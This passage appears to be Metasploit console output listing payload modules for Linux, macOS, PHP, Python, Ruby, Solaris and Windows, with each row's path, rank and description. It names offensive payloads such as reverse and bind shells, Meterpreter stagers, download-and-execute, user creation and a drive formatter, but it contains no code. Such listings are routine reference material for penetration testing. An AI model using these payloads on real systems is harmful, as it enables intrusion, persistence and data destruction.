   890   payload/linux/armle/meterpreter_reverse_tcp                                                 normal  No     Linux Meterpreter, Reverse TCP Inline
   891   payload/linux/armle/shell/bind_tcp                                                          normal  No     Linux dup2 Command Shell, Bind TCP Stager
   892   payload/linux/armle/shell/reverse_tcp                                                       normal  No     Linux dup2 Command Shell, Reverse TCP Stager
   893   payload/linux/armle/shell_bind_tcp                                                          normal  No     Linux Command Shell, Reverse TCP Inline
   894   payload/linux/armle/shell_reverse_tcp                                                       normal  No     Linux Command Shell, Reverse TCP Inline
   895   payload/linux/mips64/meterpreter_reverse_http                                               normal  No     Linux Meterpreter, Reverse HTTP Inline
   896   payload/linux/mips64/meterpreter_reverse_https                                              normal  No     Linux Meterpreter, Reverse HTTPS Inline
   897   payload/linux/mips64/meterpreter_reverse_tcp                                                normal  No     Linux Meterpreter, Reverse TCP Inline
   898   payload/linux/mipsbe/exec                                                                   normal  No     Linux Execute Command
   899   payload/linux/mipsbe/meterpreter/reverse_tcp                                                normal  No     Linux Meterpreter, Reverse TCP Stager
   900   payload/linux/mipsbe/meterpreter_reverse_http                                               normal  No     Linux Meterpreter, Reverse HTTP Inline
   901   payload/linux/mipsbe/meterpreter_reverse_https                                              normal  No     Linux Meterpreter, Reverse HTTPS Inline
   902   payload/linux/mipsbe/meterpreter_reverse_tcp                                                normal  No     Linux Meterpreter, Reverse TCP Inline
   903   payload/linux/mipsbe/reboot                                                                 normal  No     Linux Reboot
   904   payload/linux/mipsbe/shell/reverse_tcp                                                      normal  No     Linux Command Shell, Reverse TCP Stager
   905   payload/linux/mipsbe/shell_bind_tcp                                                         normal  No     Linux Command Shell, Bind TCP Inline
   906   payload/linux/mipsbe/shell_reverse_tcp                                                      normal  No     Linux Command Shell, Reverse TCP Inline
   907   payload/linux/mipsle/exec                                                                   normal  No     Linux Execute Command
   908   payload/linux/mipsle/meterpreter/reverse_tcp                                                normal  No     Linux Meterpreter, Reverse TCP Stager
   909   payload/linux/mipsle/meterpreter_reverse_http                                               normal  No     Linux Meterpreter, Reverse HTTP Inline
   910   payload/linux/mipsle/meterpreter_reverse_https                                              normal  No     Linux Meterpreter, Reverse HTTPS Inline
   911   payload/linux/mipsle/meterpreter_reverse_tcp                                                normal  No     Linux Meterpreter, Reverse TCP Inline
   912   payload/linux/mipsle/reboot                                                                 normal  No     Linux Reboot
   913   payload/linux/mipsle/shell/reverse_tcp                                                      normal  No     Linux Command Shell, Reverse TCP Stager
   914   payload/linux/mipsle/shell_bind_tcp                                                         normal  No     Linux Command Shell, Bind TCP Inline
   915   payload/linux/mipsle/shell_reverse_tcp                                                      normal  No     Linux Command Shell, Reverse TCP Inline
   916   payload/linux/ppc/meterpreter_reverse_http                                                  normal  No     Linux Meterpreter, Reverse HTTP Inline
   917   payload/linux/ppc/meterpreter_reverse_https                                                 normal  No     Linux Meterpreter, Reverse HTTPS Inline
   918   payload/linux/ppc/meterpreter_reverse_tcp                                                   normal  No     Linux Meterpreter, Reverse TCP Inline
   919   payload/linux/ppc/shell_bind_tcp                                                            normal  No     Linux Command Shell, Bind TCP Inline
   920   payload/linux/ppc/shell_find_port                                                           normal  No     Linux Command Shell, Find Port Inline
   921   payload/linux/ppc/shell_reverse_tcp                                                         normal  No     Linux Command Shell, Reverse TCP Inline
   922   payload/linux/ppc64/shell_bind_tcp                                                          normal  No     Linux Command Shell, Bind TCP Inline
   923   payload/linux/ppc64/shell_find_port                                                         normal  No     Linux Command Shell, Find Port Inline
   924   payload/linux/ppc64/shell_reverse_tcp                                                       normal  No     Linux Command Shell, Reverse TCP Inline
   925   payload/linux/ppc64le/meterpreter_reverse_http                                              normal  No     Linux Meterpreter, Reverse HTTP Inline
   926   payload/linux/ppc64le/meterpreter_reverse_https                                             normal  No     Linux Meterpreter, Reverse HTTPS Inline
   927   payload/linux/ppc64le/meterpreter_reverse_tcp                                               normal  No     Linux Meterpreter, Reverse TCP Inline
   928   payload/linux/ppce500v2/meterpreter_reverse_http                                            normal  No     Linux Meterpreter, Reverse HTTP Inline
   929   payload/linux/ppce500v2/meterpreter_reverse_https                                           normal  No     Linux Meterpreter, Reverse HTTPS Inline
   930   payload/linux/ppce500v2/meterpreter_reverse_tcp                                             normal  No     Linux Meterpreter, Reverse TCP Inline
   931   payload/linux/x64/exec                                                                      normal  No     Linux Execute Command
   932   payload/linux/x64/meterpreter/bind_tcp                                                      normal  No     Linux Mettle x64, Bind TCP Stager
   933   payload/linux/x64/meterpreter/reverse_sctp                                                  normal  No     Linux Mettle x64, Reverse SCTP Stager
   934   payload/linux/x64/meterpreter/reverse_tcp                                                   normal  No     Linux Mettle x64, Reverse TCP Stager
   935   payload/linux/x64/meterpreter_reverse_http                                                  normal  No     Linux Meterpreter, Reverse HTTP Inline
   936   payload/linux/x64/meterpreter_reverse_https                                                 normal  No     Linux Meterpreter, Reverse HTTPS Inline
   937   payload/linux/x64/meterpreter_reverse_tcp                                                   normal  No     Linux Meterpreter, Reverse TCP Inline
   938   payload/linux/x64/pingback_bind_tcp                                                         normal  No     Linux x64 Pingback, Bind TCP Inline
   939   payload/linux/x64/pingback_reverse_tcp                                                      normal  No     Linux x64 Pingback, Reverse TCP Inline
   940   payload/linux/x64/shell/bind_tcp                                                            normal  No     Linux Command Shell, Bind TCP Stager
   941   payload/linux/x64/shell/reverse_sctp                                                        normal  No     Linux Command Shell, Reverse SCTP Stager
   942   payload/linux/x64/shell/reverse_tcp                                                         normal  No     Linux Command Shell, Reverse TCP Stager
   943   payload/linux/x64/shell_bind_ipv6_tcp                                                       normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   944   payload/linux/x64/shell_bind_tcp                                                            normal  No     Linux Command Shell, Bind TCP Inline
   945   payload/linux/x64/shell_bind_tcp_random_port                                                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   946   payload/linux/x64/shell_find_port                                                           normal  No     Linux Command Shell, Find Port Inline
   947   payload/linux/x64/shell_reverse_ipv6_tcp                                                    normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   948   payload/linux/x64/shell_reverse_tcp                                                         normal  No     Linux Command Shell, Reverse TCP Inline
   949   payload/linux/x86/adduser                                                                   normal  No     Linux Add User
   950   payload/linux/x86/chmod                                                                     normal  No     Linux Chmod
   951   payload/linux/x86/exec                                                                      normal  No     Linux Execute Command
   952   payload/linux/x86/meterpreter/bind_ipv6_tcp                                                 normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   953   payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                                            normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   954   payload/linux/x86/meterpreter/bind_nonx_tcp                                                 normal  No     Linux Mettle x86, Bind TCP Stager
   955   payload/linux/x86/meterpreter/bind_tcp                                                      normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   956   payload/linux/x86/meterpreter/bind_tcp_uuid                                                 normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   957   payload/linux/x86/meterpreter/find_tag                                                      normal  No     Linux Mettle x86, Find Tag Stager
   958   payload/linux/x86/meterpreter/reverse_ipv6_tcp                                              normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   959   payload/linux/x86/meterpreter/reverse_nonx_tcp                                              normal  No     Linux Mettle x86, Reverse TCP Stager
   960   payload/linux/x86/meterpreter/reverse_tcp                                                   normal  No     Linux Mettle x86, Reverse TCP Stager
   961   payload/linux/x86/meterpreter/reverse_tcp_uuid                                              normal  No     Linux Mettle x86, Reverse TCP Stager
   962   payload/linux/x86/meterpreter_reverse_http                                                  normal  No     Linux Meterpreter, Reverse HTTP Inline
   963   payload/linux/x86/meterpreter_reverse_https                                                 normal  No     Linux Meterpreter, Reverse HTTPS Inline
   964   payload/linux/x86/meterpreter_reverse_tcp                                                   normal  No     Linux Meterpreter, Reverse TCP Inline
   965   payload/linux/x86/metsvc_bind_tcp                                                           normal  No     Linux Meterpreter Service, Bind TCP
   966   payload/linux/x86/metsvc_reverse_tcp                                                        normal  No     Linux Meterpreter Service, Reverse TCP Inline
   967   payload/linux/x86/read_file                                                                 normal  No     Linux Read File
   968   payload/linux/x86/shell/bind_ipv6_tcp                                                       normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   969   payload/linux/x86/shell/bind_ipv6_tcp_uuid                                                  normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   970   payload/linux/x86/shell/bind_nonx_tcp                                                       normal  No     Linux Command Shell, Bind TCP Stager
   971   payload/linux/x86/shell/bind_tcp                                                            normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   972   payload/linux/x86/shell/bind_tcp_uuid                                                       normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   973   payload/linux/x86/shell/find_tag                                                            normal  No     Linux Command Shell, Find Tag Stager
   974   payload/linux/x86/shell/reverse_ipv6_tcp                                                    normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   975   payload/linux/x86/shell/reverse_nonx_tcp                                                    normal  No     Linux Command Shell, Reverse TCP Stager
   976   payload/linux/x86/shell/reverse_tcp                                                         normal  No     Linux Command Shell, Reverse TCP Stager
   977   payload/linux/x86/shell/reverse_tcp_uuid                                                    normal  No     Linux Command Shell, Reverse TCP Stager
   978   payload/linux/x86/shell_bind_ipv6_tcp                                                       normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   979   payload/linux/x86/shell_bind_tcp                                                            normal  No     Linux Command Shell, Bind TCP Inline
   980   payload/linux/x86/shell_bind_tcp_random_port                                                normal  No     Linux Command Shell, Bind TCP Random Port Inline
   981   payload/linux/x86/shell_find_port                                                           normal  No     Linux Command Shell, Find Port Inline
   982   payload/linux/x86/shell_find_tag                                                            normal  No     Linux Command Shell, Find Tag Inline
   983   payload/linux/x86/shell_reverse_tcp                                                         normal  No     Linux Command Shell, Reverse TCP Inline
   984   payload/linux/x86/shell_reverse_tcp_ipv6                                                    normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)
   985   payload/linux/zarch/meterpreter_reverse_http                                                normal  No     Linux Meterpreter, Reverse HTTP Inline
   986   payload/linux/zarch/meterpreter_reverse_https                                               normal  No     Linux Meterpreter, Reverse HTTPS Inline
   987   payload/linux/zarch/meterpreter_reverse_tcp                                                 normal  No     Linux Meterpreter, Reverse TCP Inline
   988   payload/mainframe/shell_reverse_tcp                                                         normal  No     Z/OS (MVS) Command Shell, Reverse TCP Inline
   989   payload/multi/meterpreter/reverse_http                                                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   990   payload/multi/meterpreter/reverse_https                                                     normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   991   payload/netware/shell/reverse_tcp                                                           normal  No     NetWare Command Shell, Reverse TCP Stager
   992   payload/nodejs/shell_bind_tcp                                                               normal  No     Command Shell, Bind TCP (via nodejs)
   993   payload/nodejs/shell_reverse_tcp                                                            normal  No     Command Shell, Reverse TCP (via nodejs)
   994   payload/nodejs/shell_reverse_tcp_ssl                                                        normal  No     Command Shell, Reverse TCP SSL (via nodejs)
   995   payload/osx/armle/execute/bind_tcp                                                          normal  No     OS X Write and Execute Binary, Bind TCP Stager
   996   payload/osx/armle/execute/reverse_tcp                                                       normal  No     OS X Write and Execute Binary, Reverse TCP Stager
   997   payload/osx/armle/shell/bind_tcp                                                            normal  No     OS X Command Shell, Bind TCP Stager
   998   payload/osx/armle/shell/reverse_tcp                                                         normal  No     OS X Command Shell, Reverse TCP Stager
   999   payload/osx/armle/shell_bind_tcp                                                            normal  No     Apple iOS Command Shell, Bind TCP Inline
   1000  payload/osx/armle/shell_reverse_tcp                                                         normal  No     Apple iOS Command Shell, Reverse TCP Inline
   1001  payload/osx/armle/vibrate                                                                   normal  No     Apple iOS iPhone Vibrate
   1002  payload/osx/ppc/shell/bind_tcp                                                              normal  No     OS X Command Shell, Bind TCP Stager
   1003  payload/osx/ppc/shell/find_tag                                                              normal  No     OS X Command Shell, Find Tag Stager
   1004  payload/osx/ppc/shell/reverse_tcp                                                           normal  No     OS X Command Shell, Reverse TCP Stager
   1005  payload/osx/ppc/shell_bind_tcp                                                              normal  No     OS X Command Shell, Bind TCP Inline
   1006  payload/osx/ppc/shell_reverse_tcp                                                           normal  No     OS X Command Shell, Reverse TCP Inline
   1007  payload/osx/x64/dupandexecve/bind_tcp                                                       normal  No     OS X dup2 Command Shell, Bind TCP Stager
   1008  payload/osx/x64/dupandexecve/reverse_tcp                                                    normal  No     OS X dup2 Command Shell, Reverse TCP Stager
   1009  payload/osx/x64/dupandexecve/reverse_tcp_uuid                                               normal  No     OS X dup2 Command Shell, Reverse TCP Stager with UUID Support (OSX x64)
   1010  payload/osx/x64/exec                                                                        normal  No     OS X x64 Execute Command
   1011  payload/osx/x64/meterpreter/bind_tcp                                                        normal  No     OSX Meterpreter, Bind TCP Stager
   1012  payload/osx/x64/meterpreter/reverse_tcp                                                     normal  No     OSX Meterpreter, Reverse TCP Stager
   1013  payload/osx/x64/meterpreter/reverse_tcp_uuid                                                normal  No     OSX Meterpreter, Reverse TCP Stager with UUID Support (OSX x64)
   1014  payload/osx/x64/meterpreter_reverse_http                                                    normal  No     OSX Meterpreter, Reverse HTTP Inline
   1015  payload/osx/x64/meterpreter_reverse_https                                                   normal  No     OSX Meterpreter, Reverse HTTPS Inline
   1016  payload/osx/x64/meterpreter_reverse_tcp                                                     normal  No     OSX Meterpreter, Reverse TCP Inline
   1017  payload/osx/x64/say                                                                         normal  No     OS X x64 say Shellcode
   1018  payload/osx/x64/shell_bind_tcp                                                              normal  No     OS X x64 Shell Bind TCP
   1019  payload/osx/x64/shell_find_tag                                                              normal  No     OSX Command Shell, Find Tag Inline
   1020  payload/osx/x64/shell_reverse_tcp                                                           normal  No     OS X x64 Shell Reverse TCP
   1021  payload/osx/x86/bundleinject/bind_tcp                                                       normal  No     Mac OS X Inject Mach-O Bundle, Bind TCP Stager
   1022  payload/osx/x86/bundleinject/reverse_tcp                                                    normal  No     Mac OS X Inject Mach-O Bundle, Reverse TCP Stager
   1023  payload/osx/x86/exec                                                                        normal  No     OS X Execute Command
   1024  payload/osx/x86/isight/bind_tcp                                                             normal  No     Mac OS X x86 iSight Photo Capture, Bind TCP Stager
   1025  payload/osx/x86/isight/reverse_tcp                                                          normal  No     Mac OS X x86 iSight Photo Capture, Reverse TCP Stager
   1026  payload/osx/x86/shell_bind_tcp                                                              normal  No     OS X Command Shell, Bind TCP Inline
   1027  payload/osx/x86/shell_find_port                                                             normal  No     OS X Command Shell, Find Port Inline
   1028  payload/osx/x86/shell_reverse_tcp                                                           normal  No     OS X Command Shell, Reverse TCP Inline
   1029  payload/osx/x86/vforkshell/bind_tcp                                                         normal  No     OS X (vfork) Command Shell, Bind TCP Stager
   1030  payload/osx/x86/vforkshell/reverse_tcp                                                      normal  No     OS X (vfork) Command Shell, Reverse TCP Stager
   1031  payload/osx/x86/vforkshell_bind_tcp                                                         normal  No     OS X (vfork) Command Shell, Bind TCP Inline
   1032  payload/osx/x86/vforkshell_reverse_tcp                                                      normal  No     OS X (vfork) Command Shell, Reverse TCP Inline
   1033  payload/php/bind_perl                                                                       normal  No     PHP Command Shell, Bind TCP (via Perl)
   1034  payload/php/bind_perl_ipv6                                                                  normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   1035  payload/php/bind_php                                                                        normal  No     PHP Command Shell, Bind TCP (via PHP)
   1036  payload/php/bind_php_ipv6                                                                   normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   1037  payload/php/download_exec                                                                   normal  No     PHP Executable Download and Execute
   1038  payload/php/exec                                                                            normal  No     PHP Execute Command
   1039  payload/php/meterpreter/bind_tcp                                                            normal  No     PHP Meterpreter, Bind TCP Stager
   1040  payload/php/meterpreter/bind_tcp_ipv6                                                       normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   1041  payload/php/meterpreter/bind_tcp_ipv6_uuid                                                  normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   1042  payload/php/meterpreter/bind_tcp_uuid                                                       normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   1043  payload/php/meterpreter/reverse_tcp                                                         normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   1044  payload/php/meterpreter/reverse_tcp_uuid                                                    normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   1045  payload/php/meterpreter_reverse_tcp                                                         normal  No     PHP Meterpreter, Reverse TCP Inline
   1046  payload/php/reverse_perl                                                                    normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   1047  payload/php/reverse_php                                                                     normal  No     PHP Command Shell, Reverse TCP (via PHP)
   1048  payload/php/shell_findsock                                                                  normal  No     PHP Command Shell, Find Sock
   1049  payload/python/meterpreter/bind_tcp                                                         normal  No     Python Meterpreter, Python Bind TCP Stager
   1050  payload/python/meterpreter/bind_tcp_uuid                                                    normal  No     Python Meterpreter, Python Bind TCP Stager with UUID Support
   1051  payload/python/meterpreter/reverse_http                                                     normal  No     Python Meterpreter, Python Reverse HTTP Stager
   1052  payload/python/meterpreter/reverse_https                                                    normal  No     Python Meterpreter, Python Reverse HTTPS Stager
   1053  payload/python/meterpreter/reverse_tcp                                                      normal  No     Python Meterpreter, Python Reverse TCP Stager
   1054  payload/python/meterpreter/reverse_tcp_ssl                                                  normal  No     Python Meterpreter, Python Reverse TCP SSL Stager
   1055  payload/python/meterpreter/reverse_tcp_uuid                                                 normal  No     Python Meterpreter, Python Reverse TCP Stager with UUID Support
   1056  payload/python/meterpreter_bind_tcp                                                         normal  No     Python Meterpreter Shell, Bind TCP Inline
   1057  payload/python/meterpreter_reverse_http                                                     normal  No     Python Meterpreter Shell, Reverse HTTP Inline
   1058  payload/python/meterpreter_reverse_https                                                    normal  No     Python Meterpreter Shell, Reverse HTTPS Inline
   1059  payload/python/meterpreter_reverse_tcp                                                      normal  No     Python Meterpreter Shell, Reverse TCP Inline
   1060  payload/python/pingback_bind_tcp                                                            normal  No     Python Pingback, Bind TCP (via python)
   1061  payload/python/pingback_reverse_tcp                                                         normal  No     Python Pingback, Reverse TCP (via python)
   1062  payload/python/shell_bind_tcp                                                               normal  No     Command Shell, Bind TCP (via python)
   1063  payload/python/shell_reverse_sctp                                                           normal  No     Command Shell, Reverse SCTP (via python)
   1064  payload/python/shell_reverse_tcp                                                            normal  No     Command Shell, Reverse TCP (via python)
   1065  payload/python/shell_reverse_tcp_ssl                                                        normal  No     Command Shell, Reverse TCP SSL (via python)
   1066  payload/python/shell_reverse_udp                                                            normal  No     Command Shell, Reverse UDP (via python)
   1067  payload/r/shell_bind_tcp                                                                    normal  No     R Command Shell, Bind TCP
   1068  payload/r/shell_reverse_tcp                                                                 normal  No     R Command Shell, Reverse TCP
   1069  payload/ruby/pingback_bind_tcp                                                              normal  No     Ruby Pingback, Bind TCP
   1070  payload/ruby/pingback_reverse_tcp                                                           normal  No     Ruby Pingback, Reverse TCP
   1071  payload/ruby/shell_bind_tcp                                                                 normal  No     Ruby Command Shell, Bind TCP
   1072  payload/ruby/shell_bind_tcp_ipv6                                                            normal  No     Ruby Command Shell, Bind TCP IPv6
   1073  payload/ruby/shell_reverse_tcp                                                              normal  No     Ruby Command Shell, Reverse TCP
   1074  payload/ruby/shell_reverse_tcp_ssl                                                          normal  No     Ruby Command Shell, Reverse TCP SSL
   1075  payload/solaris/sparc/shell_bind_tcp                                                        normal  No     Solaris Command Shell, Bind TCP Inline
   1076  payload/solaris/sparc/shell_find_port                                                       normal  No     Solaris Command Shell, Find Port Inline
   1077  payload/solaris/sparc/shell_reverse_tcp                                                     normal  No     Solaris Command Shell, Reverse TCP Inline
   1078  payload/solaris/x86/shell_bind_tcp                                                          normal  No     Solaris Command Shell, Bind TCP Inline
   1079  payload/solaris/x86/shell_find_port                                                         normal  No     Solaris Command Shell, Find Port Inline
   1080  payload/solaris/x86/shell_reverse_tcp                                                       normal  No     Solaris Command Shell, Reverse TCP Inline
   1081  payload/tty/unix/interact                                                                   normal  No     Unix TTY, Interact with Established Connection
   1082  payload/windows/adduser                                                                     normal  No     Windows Execute net user /ADD
   1083  payload/windows/custom/bind_hidden_ipknock_tcp                                              normal  No     Windows shellcode stage, Hidden Bind Ipknock TCP Stager
   1084  payload/windows/custom/bind_hidden_tcp                                                      normal  No     Windows shellcode stage, Hidden Bind TCP Stager
   1085  payload/windows/custom/bind_ipv6_tcp                                                        normal  No     Windows shellcode stage, Bind IPv6 TCP Stager (Windows x86)
   1086  payload/windows/custom/bind_ipv6_tcp_uuid                                                   normal  No     Windows shellcode stage, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1087  payload/windows/custom/bind_named_pipe                                                      normal  No     Windows shellcode stage, Windows x86 Bind Named Pipe Stager
   1088  payload/windows/custom/bind_nonx_tcp                                                        normal  No     Windows shellcode stage, Bind TCP Stager (No NX or Win7)
   1089  payload/windows/custom/bind_tcp                                                             normal  No     Windows shellcode stage, Bind TCP Stager (Windows x86)
   1090  payload/windows/custom/bind_tcp_rc4                                                         normal  No     Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1091  payload/windows/custom/bind_tcp_uuid                                                        normal  No     Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x86)
   1092  payload/windows/custom/find_tag                                                             normal  No     Windows shellcode stage, Find Tag Ordinal Stager
   1093  payload/windows/custom/reverse_hop_http                                                     normal  No     Windows shellcode stage, Reverse Hop HTTP/HTTPS Stager
   1094  payload/windows/custom/reverse_http                                                         normal  No     Windows shellcode stage, Windows Reverse HTTP Stager (wininet)
   1095  payload/windows/custom/reverse_http_proxy_pstore                                            normal  No     Windows shellcode stage, Reverse HTTP Stager Proxy
   1096  payload/windows/custom/reverse_https                                                        normal  No     Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)
   1097  payload/windows/custom/reverse_https_proxy                                                  normal  No     Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy
   1098  payload/windows/custom/reverse_ipv6_tcp                                                     normal  No     Windows shellcode stage, Reverse TCP Stager (IPv6)
   1099  payload/windows/custom/reverse_named_pipe                                                   normal  No     Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager
   1100  payload/windows/custom/reverse_nonx_tcp                                                     normal  No     Windows shellcode stage, Reverse TCP Stager (No NX or Win7)
   1101  payload/windows/custom/reverse_ord_tcp                                                      normal  No     Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)
   1102  payload/windows/custom/reverse_tcp                                                          normal  No     Windows shellcode stage, Reverse TCP Stager
   1103  payload/windows/custom/reverse_tcp_allports                                                 normal  No     Windows shellcode stage, Reverse All-Port TCP Stager
   1104  payload/windows/custom/reverse_tcp_dns                                                      normal  No     Windows shellcode stage, Reverse TCP Stager (DNS)
   1105  payload/windows/custom/reverse_tcp_rc4                                                      normal  No     Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1106  payload/windows/custom/reverse_tcp_rc4_dns                                                  normal  No     Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1107  payload/windows/custom/reverse_tcp_uuid                                                     normal  No     Windows shellcode stage, Reverse TCP Stager with UUID Support
   1108  payload/windows/custom/reverse_udp                                                          normal  No     Windows shellcode stage, Reverse UDP Stager with UUID Support
   1109  payload/windows/custom/reverse_winhttp                                                      normal  No     Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)
   1110  payload/windows/custom/reverse_winhttps                                                     normal  No     Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)
   1111  payload/windows/dllinject/bind_hidden_ipknock_tcp                                           normal  No     Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   1112  payload/windows/dllinject/bind_hidden_tcp                                                   normal  No     Reflective DLL Injection, Hidden Bind TCP Stager
   1113  payload/windows/dllinject/bind_ipv6_tcp                                                     normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   1114  payload/windows/dllinject/bind_ipv6_tcp_uuid                                                normal  No     Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1115  payload/windows/dllinject/bind_named_pipe                                                   normal  No     Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   1116  payload/windows/dllinject/bind_nonx_tcp                                                     normal  No     Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   1117  payload/windows/dllinject/bind_tcp                                                          normal  No     Reflective DLL Injection, Bind TCP Stager (Windows x86)
   1118  payload/windows/dllinject/bind_tcp_rc4                                                      normal  No     Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1119  payload/windows/dllinject/bind_tcp_uuid                                                     normal  No     Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   1120  payload/windows/dllinject/find_tag                                                          normal  No     Reflective DLL Injection, Find Tag Ordinal Stager
   1121  payload/windows/dllinject/reverse_hop_http                                                  normal  No     Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   1122  payload/windows/dllinject/reverse_http                                                      normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   1123  payload/windows/dllinject/reverse_http_proxy_pstore                                         normal  No     Reflective DLL Injection, Reverse HTTP Stager Proxy
   1124  payload/windows/dllinject/reverse_ipv6_tcp                                                  normal  No     Reflective DLL Injection, Reverse TCP Stager (IPv6)
   1125  payload/windows/dllinject/reverse_nonx_tcp                                                  normal  No     Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   1126  payload/windows/dllinject/reverse_ord_tcp                                                   normal  No     Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   1127  payload/windows/dllinject/reverse_tcp                                                       normal  No     Reflective DLL Injection, Reverse TCP Stager
   1128  payload/windows/dllinject/reverse_tcp_allports                                              normal  No     Reflective DLL Injection, Reverse All-Port TCP Stager
   1129  payload/windows/dllinject/reverse_tcp_dns                                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (DNS)
   1130  payload/windows/dllinject/reverse_tcp_rc4                                                   normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   1131  payload/windows/dllinject/reverse_tcp_rc4_dns                                               normal  No     Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
   1132  payload/windows/dllinject/reverse_tcp_uuid                                                  normal  No     Reflective DLL Injection, Reverse TCP Stager with UUID Support
   1133  payload/windows/dllinject/reverse_winhttp                                                   normal  No     Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
   1134  payload/windows/dns_txt_query_exec                                                          normal  No     DNS TXT Record Payload Download and Execution
   1135  payload/windows/download_exec                                                               normal  No     Windows Executable Download (http,https,ftp) and Execute
   1136  payload/windows/encrypted_shell/reverse_tcp                                                 normal  No     Windows Command Shell, Encrypted Reverse TCP Stager
   1137  payload/windows/encrypted_shell_reverse_tcp                                                 normal  No     Windows Encrypted Reverse Shell
   1138  payload/windows/exec                                                                        normal  No     Windows Execute Command
   1139  payload/windows/format_all_drives                                                           manual  No     Windows Drive Formatter
   1140  payload/windows/loadlibrary                                                                 normal  No     Windows LoadLibrary Path
   1141  payload/windows/messagebox                                                                  normal  No     Windows MessageBox
   1142  payload/windows/meterpreter/bind_hidden_ipknock_tcp                                         normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   1143  payload/windows/meterpreter/bind_hidden_tcp                                                 normal  No     Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   1144  payload/windows/meterpreter/bind_ipv6_tcp                                                   normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   1145  payload/windows/meterpreter/bind_ipv6_tcp_uuid                                              normal  No     Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   1146  payload/windows/meterpreter/bind_named_pipe                                                 normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   1147  payload/windows/meterpreter/bind_nonx_tcp                                                   normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   1148  payload/windows/meterpreter/bind_tcp                                                        normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   1149  payload/windows/meterpreter/bind_tcp_rc4                                                    normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   1150  payload/windows/meterpreter/bind_tcp_uuid                                                   normal  No     Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   1151  payload/windows/meterpreter/find_tag                                                        normal  No     Windows Meterpreter (Reflective Injection), Find Tag Ordinal Stager
   1152  payload/windows/meterpreter/reverse_hop_http                                                normal  No     Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   1153  payload/windows/meterpreter/reverse_http                                                    normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   1154  payload/windows/meterpreter/reverse_http_proxy_pstore                                       normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
   1155  payload/windows/meterpreter/reverse_https                                                   normal  No     Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   1156  payload/windows/meterpreter/reverse_https_proxy                                             normal  No     Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   1157  payload/windows/meterpreter/reverse_ipv6_tcp                                                normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   1158  payload/windows/meterpreter/reverse_named_pipe                                              normal  No     Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
